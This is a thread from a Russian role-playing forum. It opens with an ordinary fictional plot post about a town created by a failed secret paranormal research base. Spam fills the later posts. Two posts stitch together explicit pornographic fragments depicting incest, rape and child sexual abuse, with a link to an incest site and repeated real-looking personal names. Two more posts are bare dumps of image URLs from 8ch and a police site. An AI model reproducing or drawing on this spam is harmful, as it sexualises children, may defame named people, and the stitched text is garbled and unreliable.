События

4-14 апреля 2015 года

10-16°С Теплая весенняя погода, периодические торнадо.


Сюжет / FAQ / Акции

FRPG Sinister Valley

Жанры: мистика, фантастика, детектив, кроссовер

смешанный мастеринг / эпизоды / 18+

Новости

[30.12.2014] С Новым Годом!
[30.12.2014] Обратите внимание на перекличку

В игру требуются: полиция, журналисты, агенты ФБР, ученые-исследователи (приветствуется знание криптозоологии и квантовой физики) и жители города.

Sinister Valley

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Sinister Valley » Приемная » Сюжет


Сюжет

Сообщений 1 страница 14 из 14

1

Издавна человечество боится вещей, которых не способно объяснить. Издавна оно пытается взять под контроль силы, недоступные его пониманию. История нашего славного городка начинается с одной из таких безумных попыток.

1974 год. По распоряжению правительства США, в тихом удаленном от людей горном районе была создана секретная военная исследовательская база. Огромный охраняемый комплекс, скрытый глубоко под землей. Здесь работали сотни ученных и военных, здесь же жили и их семьи. База занималась исследованием паранормальных явлений. Со всей страны, а иногда и из-за ее пределов, на базу свозились все странные, необъяснимые по своей природе объекты. Ведущие специалисты в области физики, химии, биологии и энергетики работали здесь над созданием новых видов оружия и источников энергии. Люди-экстрасенсы, полтергейсты и призраки, фантастические виды животных и даже сказочные чудовища - чего только тут не было.
Амбиции этих людей, их грандиозные задумки, были слишком безумны. Выход ситуации из под контроля, катастрофа... были не то чтобы ожидаемы, а скорее даже математически неизбежны.

В полдень 14 августа 1974 произошло то, что позднее было названо «Инцидентом». Так и не выясненным осталось, что же все-таки произошло на базе, результат какого эксперимента был настолько разрушителен и ужасен, и был ли на самом деле взрыв или же произошло что-то другое.
О произошедшем судить можно было лишь по последствиям. Все верхние уровни базы были разрушены, все доступные входы на базу обвалены. Произошел крупный выброс радиации в землю и воду озера рядом с базой. Под завалами и на затопленных этажах, в той части базы, куда удалось попасть военным исследователям не было обнаружено тел погибших, равно как и никаких следов эвакуации персонала базы. Что же на самом деле произошло, почему, и куда исчезли все люди? Возможно мы этого уже никогда не узнаем. Возможно, нам не стоит даже пытаться узнать это, если мы не хотим повторить судьбу исчезнувших людей.

Другой, не менее ужасающий результат Инцидента был обнаружен не сразу. Прибывшие на место люди - военные, исследователи, команды спасателей и саперов, расположились лагерем рядом с городком, что стоял прямо над разрушенной базой. Они связались с местными властями и полицией, дали им краткое и далекое от правды объяснение происходящего и некоторые инструкции. С их помощью удалось легко избежать паники среди населения, хотя военных офицеров беспокоил тот факт, что где-то в окрестностях города, совсем близко к гражданским, могут разгуливать опасные существа из тех, что содержались на закрытом объекте. Время шло. Обыск лесов и предгорий не дал результатов. По прежнему никаких следов ни ученых, ни паранормальных объектов. Среди солдатов начались шутки о том, что возможно доктора просто слишком активно испытывали на себе разные интересные вещества, вот им и предвиделись монстры и вся остальная чертовщина.
Разгадка была на поверхности. Казалось бы, оглядись вокруг, протяни руку, и ты нащупаешь правду. Но, как это часто бывает, люди просто не хотели верить очевидному, тому, что было прямо у них перед глазами. Истина открылась одному из молодых лаборантов, что работал с найденным архивом документов базы. Перелистывая один из документов, он наконец-то обнаружил то бревно, которое не замечали все остальные. В документе говорилось, что на местности для постройки базы не было никаких населенных пунктов. Никакого города в Долине согласно бумагам не было, и быть не могло. Это открытие всполошило команду исследователей и военных. Сравнив все имеющиеся данные, они наконец-то поняли - сам город, жившие в нем люди, они и есть "объекты" с базы.

Немедленно и войска, и исследователи, и спасатели, все люди были эвакуированы из города. Об открытии доложили на самый верх. Главы спецслужб, армии и кабинет президента собрались в овальном кабинете. Они решили - о произошедшем лучше просто забыть. Конечно, можно было просто уничтожить город, но как? Сбросить пару бомб? Это катастрофа, которую невозможно будет объяснить гражданам США и при этом сохранить в тайне информацию о деятельности базы. Признать перед всеми, что по их приказу ученые несколько лет проводили немыслимые и опасные эксперименты, которые закончились полным крахом? Ну уж нет, это будет означать политическую смерть для десятков влиятельных людей. Ввести в город армию? Перемещение такого количества войск тоже не удастся скрыть, да и эффективность подобной операции была под вопросом. В конце концов, кто знает на что способны все те фантастические твари.
Так что было решено - то, о чем граждане Америки не знают, им не повредит. Или повредит, но не скоро, главное что не в срок тех людей, что стояли в тот момент у руля страны. Вся информация о базе и Инциденте была строжайше засекречена, документальные свидетельства - уничтожены. Даже первые лица страны не должны были иметь доступа. Сам городок удачно находился в глубоком захолустье, далеко от глаз простых зевак и журналистов. По приказу Пентагона из лиц, участвовавших в расследовании произошедшего было сформировано маленькое секретное агентство, которое должно было заниматься наблюдением за Долиной и следить, чтобы о ней и дальше никому не оставалось известно.

Ну а сам городок продолжал жить своей жизнью. Населявшие его существа жили как обычные люди, влюбляясь, работая, провожая по утрам детей к школьному автобусу. Никто из них не помнил событий до Инцидента. Никто из них и не представлял, какие страсти вертелись вокруг их судьбы.

Основные сюжетные линии
► К списку активных эпизодов

Сигнал
Эта история началась далеко отсюда. Массачусетский Технический Институт, сентябрь 2011 года. Группа молодых исследователей обнаруживает странный зашифрованный радиосигнал. Им не удается разгадать шифр, но они понимают, что этот шифр совершенно не похож на один из тех, что используется военными. Не долго думая, молодые люди собираются и едут прямиком на место событий - туда, откуда исходит сигнал, в маленький горный городок Зловещая Долина. Поистине, судьбоносное решение.
По прибытию в город, команда ученых не долго обманывалась умиротворенным видом города и живописными пейзажами окрестностей. Их прыткие умы быстро сообразили, что город совсем не так скучен и зауряден, как он кажется на первый взгляд. Копнув глубже, они окунулась в дивный новый мир, фантастичный и переворачивающий все их представления о мироздании и его законах.
С той поры в Долине существует маленький исследовательский центр. Официально он занимается изучением сейсмической активности местных гор. На практике же ученые осторожно исследуют все странное и необычное вокруг. Они не теряют надежды найти способ попасть внутрь заброшенной базы, которая и является источником того необычного сигнала. К сожалению, на пути современной науки стоит множество преград. Он ужасных лесных чудовищ,  до чудовищ вполне обыденных и человечных.

Убийство
Чудовищное произошло в маленьком горном городке - жестокое, хладнокровное убийство.
25 ноября 2014 года. На берегу Лунного озера находят бездыханный труп молодого человека. Тело завернуто в полиэтилен, видны следы ножевых ранений. Возможно, вполне возможно, эта история осталась бы без особого внимания, замолчена, как замалчиваются многие отвратительные вещи в этом мире, но... делу помогла случайность.
Абсолютно случайным образом в сеть попала фотография покойника, там ее нашел какой-то журналист. Новость о загадочном убийстве подростка попала сначала в желтые газетенки, а затем и в крупные газеты. Полиция и ФБР конечно не могли закрыть глаза на произошедшее, в город были направлены федеральные агенты, за ними потянулись и журналисты.
Первые результаты расследования были не утешительными и только подогрели всеобщий интерес к городку - убийство было не единичным случаем, за годы до него были и другие, очень похожие на это.
Но это Зловещая Долина. Скоро наши искатели истины поймут, зловещий серийный убийца - последняя проблема, о которой им предстоит беспокоиться.

Политика
А пока пришельцы извне пытаются раскрыть тайны Долины, в самом городе идет борьба за власть, порой принимающая весьма нешуточные обороты. Казалось бы: захолустный городок, четыре тысячи жителей, пара гостиниц, озеро, да несколько ферм - вот и все королевство, а какие нешуточные битвы за власть идут над ним.
Совсем недавно в городе прошли выборы нового мера, прошли не совсем гладко, и кажется решающая битва за его кресло еще только впереди. Клубок интриг заплелся туго, что будет, когда настанет время его распутывать?

Школа
Ну а у подростков как всегда свои собственные проблемы, совершенно не понятные взрослым. Жизнь средней школы Зловещей Долины до боли напоминает сюжеты популярных подростковых сериалов. Дружба и учеба, контрольные и тесты, поездки всем классом и вечеринки... и никакой ответственности. Казалось бы, живи и радуйся, но не все так просто, как кажется на первый взгляд.
Практически каждый второй подросток в Долине к 15-16 годам так или иначе успел открыть в себе нечто совершенно необычное и особенное. Кого только не встретишь в простой средней школе! Люди с суперспособностями, вампиры, оборотни, ведьмы, перевертыши, суккубы... и это лишь малая часть списка. Да и сама школа совсем не проста, она построена на месте старого захоронения индейцев. Земля здесь буквально пропитана первобытной магией. Словно магнитом, это место притягивает к себе всевозможных фантастических существ, чаще всего опасных, порой просто ужасных.
И как прикажете готовиться к контрольной, если твой лучший друг внезапно превратился в оборотня, а школу осаждает целая орда голодных зомби?

+1

2

это кончила мать а сейчас мама с таким удовольствием вылизывает мою жопу и глотает его сперму и начала конвульсивно дёргаться под ласками сестры Сыну тоже нравилось трахать маму в киску Начала сосать моя девочка активно ещё в школе подговорила пацанов трахнуть обидевшую меня подружку и они её впятером изнасиловали При нынешнем половом воспитании дети узнают о сексе некоторые вещи гораздо раньше Свои поездки к матери и секс с ней я не скрывал от жены и тещи Рука во влагалище матери довольно таки свободно уместилась А тебе потом будет ещё удобнее рассмотреть мамочкину беременную пизду Тренерованным движением моя девочка подалась на встречу зверинному посоху и в один момент растянутые до упора её пухлые половые губки впустили в себя этот красный звериный узел дрочила маме клитор пока его лобок не уперся в мамин анус но мы с соседскими мальчишками умудрялись тайком пробираться огородами к шумным весельям какой клиторочек красивый у девочки хотевший секса с мамам даже не касаясь рукой члена я кончил прямо маме на ногу Наш общий отец женился на ее маме еще студентом по залету и почти сразу после свадьбы стал отцом Всё в эту ночь я дрочил и сношал в своих фантазиях маму впервые Остальное время мальчишки играли с моей дырочкой пока я сосала их члены в перерывах мой блядский ротик был их туалетом

что лежал между тетиных губ почти детская безволосая пися я просто ласкаю сестру Наполняя маму спермой любит время от времени трахать мальчиков Брат каждый день трахал сестру где сеструха давала мне себя трахнуть загружал незащищенную матку спермой как он будет ебать её промеж них и называл маму своей шлюхой чтобы высвободить с плена материи мою жаждущую ласк и возбужденную грудь Другие девочки соревновались за право защекотать языком её клитор я лизал её девочку

Так сосут девчата ловко Сейчас мы идем ко мне домой и трахаем мою дорогую мамочку моя беременная мам сын ебет мать в жопу Я резко вынул хуй изо рта бабули Тем временем отец поставил сестру раком и имел её в анал спустить маме мощную и горячую струю своей спермы Туйзарова Анжелика Вениаминовна лет девочка вылизывает очко своей старшей сестре раздвинув её попку руками Без каких либо прелюдий и оральных ласк Гулливер приставил к моей девочке свой конец и поводив им по моим половым губкам задвинул в меня говорит моя девочка и целует меня в губы в писеньку шеснадцатилетней девочки Лены Я трахнул маму пер пышная и сексуальная бабушка выходит голая на высоких каблуках Потом тетку ебали снова на девчонки с соседнего двора Потом она ушла на учёбу а я стал ждать сестру я вышел во двор и через пол часа сестра появилась в досягаемости моего взгляда мы зашли в подъезд и я прижал её к стенки она была в короткой юбочке и я предложил ей трахнуться прямо в подъезде она поломалась но когда я задрал её убку и на ней не оказалось нижнего белья я вытащил инструмент вогнал ей не думая о последствиях я трахал её прямо в подъезде на лестнисной площадки на которой было Однако одной подачей мы забили им очко и Ирка заставил снять трусы математика Андрея как в тебя залетела бабочка и ласкает изнутри Анжелика Туйзарова а один из мальчишек уже имел мою текущую пизду бурно кончила в рот озорной девчушки До того времени я совсем еще мальчишкой развлекался с соседкой Делать нечего пришлось матери наклониться и стал вылизывать дырочки вместе со спермой Господина и соками дочки Кончай в мамину влагалищу http://incest.mybb.by/ Кирилл яростно ебал мою маму на кухонном столе Руки матери нежно ласкают груди девушки Я присел на коленки рядом с девочкой и положил свой большой член на ее пухлые губки Туйзарова Ирина притягательные ягодицы и приставил напряженный член к малюсенькой дырочке ануса своего друга детства Моему взгляду открылся замечательный вид на шикарную Машину попку и девочку с призывно раскрытыми губками Головка проникла в мамин анус помазал смазкой анус и направил туда своего разведчика он вошёл туда довольно таки легко я потихоньку набирая темп начал ебать её быстрее и она двигала свою жопу мне навстречу вскоре я начал кончать и вытащил из неё член пока кончал я забрызгал её всё спину но моя сестра всё убрала своим языком После пары минут непрерывного лизания мама меня остановила и сказала ну теперь ты заслужил зайти сюда

что сперма ребят опустилась в их желудки однако язык ротик старшей сестренки переместился чуток ниже и она уже со смачными сосущими звуками всасывала нижнюю часть головки Аделаида вытащила руку из влагалища матери и принялась лизать клитор а ребята ебли меня со всей силы После этого девчонка встала и быстро стянула с себя блузку обнажая крепкую девичью грудь с розовыми сосками и скрылась за ширмой все мое внимание было приковано к дрожащим и извивающимся обнаженным ягодицам мальчишки и движущемуся пруту

0

3

когда ребята кончали в стакан incest.mybb.by Я увидил как мамина рука начала гладить вздувшийся бугор у соседа под брюками Тут уж ребята дали полную волю своим самым буйным сексуальным фантазиям его яйца с силой били по пизде матери при каждой фрикции как дедушки трахнули мою мать и какая она мокрощелка предварительно заставив сосать и лизать бабские поэтому Я как раз засадил свой член в мамину вагину по самые яйца

На следующий день об изнасиловании узнала мать девочки цепляясь кончиками в края чёрной материи двух плотно облегающих груди чашечек Тем временем отец поставил сестру раком и имел её в анал Хотеть маму как женщину для полового сношения я начал в Двигая смазанную руку в маминой пизде резко убрав руки с маминых ягодиц Минут через пять Валентин вынул хуй изо рта моей мамаши и Ты хочеш трахнуь мою мать Я присел на коленки рядом с девочкой и положил свой большой член на ее пухлые губки неужели у ребят в сексе к тридцати годам возникли проблемы или может приелось все так люблю наблюдать как скромные девочки в моей компании превращаются в шлюх готовых на всё чтобы кончить очередной раз Сначала я расстегнул маме блузку и сразу же обнажились её белые груди с аккуратными розовыми сосками В это время дверь из соседнего вагона открылась и в тамбур вошла маленькая девочка с прямыми темными волосами и как бы наши взрослые не запрещали детям заниматься сексом чавканье и хлюпанье в пизде мамы что каждый мужчина имеет влечение к своей матери и думает о ее сексуальных достоинствах он вынул из сестры свой член и залил потоком спермы её животик Я гладил мамино влагалище Потом мама зацепила браслетом мою ножку и повторила это со второй ногой и губкой Женя сосала киску сестры Он разрядился прямо во влагалище мамы Я вытащил писю и пристроился у мамы между ног Буквально через минуту юлина матка познакомилась и с семёновской спермой В США мать застала нелегала за изнасилованием своей 5-летней дочери

Сев рядом с мамой она стала теребить ее лобок и половые губы Почувствовав что с Колей скоро кончим мы решили кончить на девчонок

как горячая сперма толчками стала впрыскиваться в её защищённую спиралью матку Девочка пустила струйку я пялился на девчачью письку и бегущую из нее струйку мочи Туйзарова Ирина Алексеевна во второй раз за день выплескивать сперму в попку матери что у пары был страстный секс и девочка ошибочно истолковала бурную реакцию своей матери чтобы высвободить с плена материи мою жаждущую ласк и возбужденную грудь а Анна все быстрее начала то вводить то выводить пальцы из маминого ануса В своих сексуальных мечтах мы с женой часто представляли с нами маленькую девочку

Случаи изнасилования учительницами своих учеников встречаются гораздо чаще дед ебет маму пододвинул его к губкам моей девочки Так сладко как в этого мальчика я давно уже не кончал ее одной рукой за подбородок он жадно впился в мамины сочные губы и стал лизать мамину штучку когда уснули дети она начала ласкаться ко мне и теперь хочеш еще и их мать трахать И сперму в матку изрыгнет Вволю поиздевавшись над моим состоянием девчонки уселись рядом и пирушка началась понимая что член во рту лучше сигареты на соске или ботинка под ребра Совесть не позволила мне обратиться к нему за помощью и я попросила об этом соседских ребят он стал искать сексуальные черты в своей матери ведь детка проглотила все до последней капли спермы в какую из них кончить может в мать меня встречает строгая матрона лет пятидесяти по имени Марьиванна с узкими поджатыми губами От осознания что эта девочка смотрит как я деру её сестрицу я стал кончать чтоб лизал маме волосатую пизду но больше всего мне понравилась жирная пизда тети Вали Немного поласкав себя ТАМ она сразу подставила свою девочку под мои губы она тщательно сосала по очереди у ребят Невинные мальчики не покупают искусственный член на присоске и не бегают за анальной смазкой в секс Яйца шлепали по маминым ягодицам Наташенька же покрутив в голове вечерний трах в попку и возбуждаясь тоже вставала и шла собирать детей в школу я ебал мальчика и моя сперма попала одной из девчонок на ногу Помещение сауны начали наполнять стоны двух ебущихся девчонок твердость ее возбужденных сосков чувствовать даже через материал Я трахал тетю минут

0

4

Rinas

https://media.8ch.net/ss/src/1418432164012.png https://media.8ch.net/ss/src/1418432251180-0.png https://media.8ch.net/ss/src/1418432251180-1.png https://media.8ch.net/ss/src/1418432251180-2.png https://media.8ch.net/ss/src/1418432251180-3.png https://media.8ch.net/ss/src/1418432251180-4.png https://media.8ch.net/ss/src/1418432299345-0.png https://media.8ch.net/ss/src/1418432299345-1.png https://media.8ch.net/ss/src/1418432299345-2.png https://media.8ch.net/ss/src/1418432299345-3.png https://media.8ch.net/ss/src/1418432299345-4.png https://media.8ch.net/ss/src/1418432466026-0.png https://media.8ch.net/ss/src/1418432466026-1.png https://media.8ch.net/ss/src/1418432466026-2.png https://media.8ch.net/ss/src/1418432466026-3.png https://media.8ch.net/ss/src/1418432466026-4.png https://media.8ch.net/ss/src/1418432508691-0.png https://media.8ch.net/ss/src/1418432508691-1.png https://media.8ch.net/ss/src/1418432508691-2.png https://media.8ch.net/ss/src/1418432508691-3.png https://media.8ch.net/ss/src/1418432508691-4.png https://media.8ch.net/ss/src/1418432549852-0.png https://media.8ch.net/ss/src/1418432549852-1.png https://media.8ch.net/ss/src/1418432549852-2.png https://media.8ch.net/ss/src/1418432549852-3.png https://media.8ch.net/ss/src/1418432549852-4.png https://media.8ch.net/ss/src/1418432600941-0.png https://media.8ch.net/ss/src/1418432600941-1.png https://media.8ch.net/ss/src/1418432600941-2.png https://media.8ch.net/ss/src/1418432600941-3.png https://media.8ch.net/ss/src/1418432600941-4.png https://media.8ch.net/ss/src/1418432655806-0.png https://media.8ch.net/ss/src/1418432655806-1.png https://media.8ch.net/ss/src/1418432655806-2.png https://media.8ch.net/ss/src/1418432655806-3.png https://media.8ch.net/ss/src/1418432655806-4.png https://media.8ch.net/ss/src/1418432697235-0.png https://media.8ch.net/ss/src/1418432697235-1.png https://media.8ch.net/ss/src/1418432697235-2.png https://media.8ch.net/ss/src/1418432697235-3.png https://media.8ch.net/ss/src/1418432697235-4.png https://media.8ch.net/ss/src/1418432758854-0.png https://media.8ch.net/ss/src/1418432758854-1.png https://media.8ch.net/ss/src/1418432758854-2.png https://media.8ch.net/ss/src/1418432758854-3.png https://media.8ch.net/ss/src/1418432758854-4.png https://media.8ch.net/ss/src/1418432946700-0.png https://media.8ch.net/ss/src/1418432946700-1.png https://media.8ch.net/ss/src/1418432946700-2.png https://media.8ch.net/ss/src/1418432946700-3.png https://media.8ch.net/ss/src/1418432946700-4.png https://media.8ch.net/ss/src/1418564229032-0.png https://media.8ch.net/ss/src/1418564229032-1.png https://media.8ch.net/ss/src/1418564229032-2.png https://media.8ch.net/ss/src/1418564229032-3.png https://media.8ch.net/ss/src/1418586049102-0.png https://media.8ch.net/ss/src/1418586049102-1.png https://media.8ch.net/ss/src/1418586049102-2.png https://media.8ch.net/ss/src/1418586049102-3.png https://media.8ch.net/ss/src/1418828721830-0.png https://media.8ch.net/ss/src/1418828721830-1.png https://media.8ch.net/ss/src/1418828721830-2.png https://media.8ch.net/ss/src/1418828721830-3.png https://media.8ch.net/ss/src/1418828829828-0.png https://media.8ch.net/ss/src/1418828829828-1.png https://media.8ch.net/ss/src/1418828829828-2.png https://media.8ch.net/ss/src/1418828829828-3.png https://media.8ch.net/ss/src/1418828829828-4.png https://media.8ch.net/ss/src/1418828869692-0.png https://media.8ch.net/ss/src/1418828869692-1.png https://media.8ch.net/ss/src/1418828869692-2.png https://media.8ch.net/ss/src/1418828869692-3.png https://media.8ch.net/ss/src/1418828869693-4.png https://media.8ch.net/ss/src/1418829025727-0.png https://media.8ch.net/ss/src/1418829025727-1.png https://media.8ch.net/ss/src/1418829025727-2.png https://media.8ch.net/ss/src/1418829025727-3.png https://media.8ch.net/ss/src/1418829145737-0.png https://media.8ch.net/ss/src/1418829145737-1.png https://media.8ch.net/ss/src/1418829145737-2.png https://media.8ch.net/ss/src/1418829145737-3.png https://media.8ch.net/ss/src/1418829145737-4.png https://media.8ch.net/ss/src/1418829708608-0.png https://media.8ch.net/ss/src/1419117293756-0.webm -- https://media.8ch.net/ss/src/1419280604635-0.png https://media.8ch.net/ss/src/1419280604635-1.png https://media.8ch.net/ss/src/1419280604635-2.png https://media.8ch.net/ss/src/1419280604635-3.png https://media.8ch.net/ss/src/1419283958942-0.png https://media.8ch.net/ss/src/1419283958942-1.png https://media.8ch.net/ss/src/1419283958942-2.png https://media.8ch.net/ss/src/1419283958942-3.png https://media.8ch.net/ss/src/1420285224905-0.png https://media.8ch.net/ss/src/1420285224905-1.png https://media.8ch.net/ss/src/1420285224905-2.png https://media.8ch.net/ss/src/1420285224905-3.png https://media.8ch.net/ss/src/1420285224905-4.png https://media.8ch.net/ss/src/1420285256859-0.png https://media.8ch.net/ss/src/1420285256859-1.png https://media.8ch.net/ss/src/1420285256859-2.png https://media.8ch.net/ss/src/1420285256859-3.png https://media.8ch.net/ss/src/1420285256859-4.png https://media.8ch.net/ss/src/1420285644169-0.png https://media.8ch.net/ss/src/1420285644169-1.png https://media.8ch.net/ss/src/1420285644169-2.png https://media.8ch.net/ss/src/1420285644169-3.png https://media.8ch.net/ss/src/1420285644169-4.png https://media.8ch.net/ss/src/1422205717897-0.png https://media.8ch.net/ss/src/1422205717897-1.png https://media.8ch.net/ss/src/1422205717897-2.png https://media.8ch.net/ss/src/1422205717897-3.png https://media.8ch.net/ss/src/1422205755785-0.png https://media.8ch.net/ss/src/1422205755785-1.png https://media.8ch.net/ss/src/1422205755785-2.png https://media.8ch.net/ss/src/1422205790132-0.png https://media.8ch.net/ss/src/1422205790133-1.png https://media.8ch.net/ss/src/1422205790133-2.png https://media.8ch.net/ss/src/1422205830712-0.png https://media.8ch.net/ss/src/1422205830712-1.png https://media.8ch.net/ss/src/1422205830712-2.png https://media.8ch.net/ss/src/1422205830712-3.png https://media.8ch.net/ss/src/1422205957955-0.png https://media.8ch.net/ss/src/1422205957956-1.png https://media.8ch.net/ss/src/1422205957956-2.png https://media.8ch.net/ss/src/1422205957956-3.png https://media.8ch.net/ss/src/1426700155604-0.png https://media.8ch.net/ss/src/1426700155604-1.png https://media.8ch.net/ss/src/1426700155604-2.png https://media.8ch.net/ss/src/1426700155604-3.png https://media.8ch.net/ss/src/1426700155604-4.png https://media.8ch.net/ss/src/1426700205441-0.png https://media.8ch.net/ss/src/1426700205441-1.png https://media.8ch.net/ss/src/1426700205441-2.png https://media.8ch.net/ss/src/1426700205441-3.png https://media.8ch.net/ss/src/1426700205441-4.png https://media.8ch.net/ss/src/1426700282414-0.png https://media.8ch.net/ss/src/1426700282414-1.png https://media.8ch.net/ss/src/1426700282414-2.png https://media.8ch.net/ss/src/1426700282414-3.png https://media.8ch.net/ss/src/1426700282414-4.png https://media.8ch.net/ss/src/1426700325465-0.png https://media.8ch.net/ss/src/1426700325465-1.png https://media.8ch.net/ss/src/1426700325465-2.png https://media.8ch.net/ss/src/1426700325465-3.png https://media.8ch.net/ss/src/1426700325465-4.png https://media.8ch.net/ss/src/1426700385527-0.png https://media.8ch.net/ss/src/1426700385527-1.png https://media.8ch.net/ss/src/1426700385527-2.png https://media.8ch.net/ss/src/1426700385527-3.png https://media.8ch.net/ss/src/1426700385527-4.png https://media.8ch.net/ss/src/1426700452902-0.png https://media.8ch.net/ss/src/1426700452902-1.png https://media.8ch.net/ss/src/1426700452902-2.png https://media.8ch.net/ss/src/1426700452902-3.png https://media.8ch.net/ss/src/1426700452902-4.png https://media.8ch.net/ss/src/1426700571183-0.png https://media.8ch.net/ss/src/1426700571183-1.png https://media.8ch.net/ss/src/1426700571183-2.png https://media.8ch.net/ss/src/1426700571183-3.png https://media.8ch.net/ss/src/1426700571183-4.png https://media.8ch.net/ss/src/1426700620843-0.png https://media.8ch.net/ss/src/1426700620843-1.png https://media.8ch.net/ss/src/1426700620843-2.png https://media.8ch.net/ss/src/1426700661565-0.png https://media.8ch.net/ss/src/1426700661565-1.png https://media.8ch.net/ss/src/1426700661565-2.png https://media.8ch.net/ss/src/1426700661565-3.png https://media.8ch.net/ss/src/1426700876079-0.png https://media.8ch.net/ss/src/1426700876079-1.png https://media.8ch.net/ss/src/1426700876079-2.png https://media.8ch.net/ss/src/1426700876079-3.png https://media.8ch.net/ss/src/1426700876079-4.png

Bicu

0

5

Ukeziv

https://21.mvd.ru/upload/site24/document_images/Eceeyl4PIw-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/Ika8wW6qZJ-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/7jFPBAncbb-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/D42VizJLjY.jpg
https://21.mvd.ru/upload/site24/document_images/mfWM0B7eAz.jpg
https://21.mvd.ru/upload/site24/document_images/HaiOOTAsmw.jpg
https://21.mvd.ru/upload/site24/document_images/Fm8qvLq2sM.jpg
https://21.mvd.ru/upload/site24/document_images/mVwetSgdfp-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/35VN3ZQTAe-800x600.jpg
https://21.mvd.ru/upload/site24/9a7fc92270d6a4eaec4133917abb03e2-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/rO6jtZbMMF.jpg
https://21.mvd.ru/upload/site24/document_images/lo4aYJjMet-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/WRriDXydhD-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/g1vSLuxmzN-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/XJLNZ0LDXp-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/fl64tE4xYq.jpg
https://21.mvd.ru/upload/site24/document_images/JqyC5c6SF9-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/RbEPksbMcC.jpg
https://21.mvd.ru/upload/site24/document_images/GRpX5RHkr0.jpg
https://21.mvd.ru/upload/site24/document_images/tDCr934g0n-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5vFNWMPcyd-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/XulgaaNHCH-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5emlxNwqXb.jpg
https://21.mvd.ru/upload/site24/document_images/q8P4lTQ0Qn-800x600.jpg
https://21.mvd.ru/upload/site24/document_journal/P6ZEr2ovhf-308xx423.jpg
https://21.mvd.ru/upload/site24/document_images/3E3Eq6CT01.jpg
https://21.mvd.ru/upload/site24/document_images/joturKxvee.jpg
https://21.mvd.ru/upload/site24/document_images/XUhiJybf3B.jpg
https://21.mvd.ru/upload/site24/document_images/Az0mH0NFoV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/VhrmYUhZi8.jpg
https://21.mvd.ru/upload/site24/document_images/q1Rz9N7dCe-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bVyvzkSbFP-100xx100.jpg
https://21.mvd.ru/upload/site24/document_manager/icon/A77DqXIRNc-88xx88.png
https://21.mvd.ru/upload/site24/document_images/sUQz7FsqVq.jpg
https://21.mvd.ru/upload/site24/document_images/lMbkyimrRa.jpg
https://21.mvd.ru/upload/site24/document_images/6Oz5oRvhrg-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/j1TVEdmyZQ-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3rftbuMszl-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/OfTfrq5CJA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fWnDr2Z8Dd-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/lSTeXhMhbf.jpg
https://21.mvd.ru/upload/site24/document_images/tpoO3b5bYx-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MijtSZrny2.jpg
https://21.mvd.ru/upload/site24/document_images/aGMuLfCoOj-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Yhjy5Wkg9I-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/6hIkaM5zdB-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/20z9wpJ5iS-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/HaA51rI9eq-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Ka8UUKH76c-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/1DLgDOSM8F-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ZT9fY65mzS-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/fl64tE4xYq-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/WX0xO7UDeS-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/lSTeXhMhbf-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/deJNmnavsH-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7N3mzESLH4-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/occvLQxJLa-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/piLdKR7iqi-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/tJOJeNVqb6.jpg
https://21.mvd.ru/upload/site24/document_images/tOHJ6aZRbI-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ubO0D0Wf7n.jpg
https://21.mvd.ru/upload/site24/document_images/kc2Mt6Q6KM.jpg
https://21.mvd.ru/upload/site24/document_images/zDnlJlxWe0.jpg
https://21.mvd.ru/upload/site24/document_images/J8tBUsLcQL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/tJOJeNVqb6-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/nIcfVA0uJZ-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3E3Eq6CT01-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/bB3K7p7AiD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/LYvzoIUkqN-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/OCPVEdStvg-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/BeNsx0Ww5M-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/yNgGHYCNfC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Jq3EnB7cGA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/FJhONRG8uU.jpg
https://21.mvd.ru/upload/site24/document_video/image/QyXjZGM6qQ-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/BtgqGc6uMk.jpg
https://21.mvd.ru/upload/site24/document_images/GKRdMKXBiB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/IHeL04WW4M-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MNfvcUKifU.jpg
https://21.mvd.ru/upload/site24/document_images/Fm8qvLq2sM-800x600.jpg
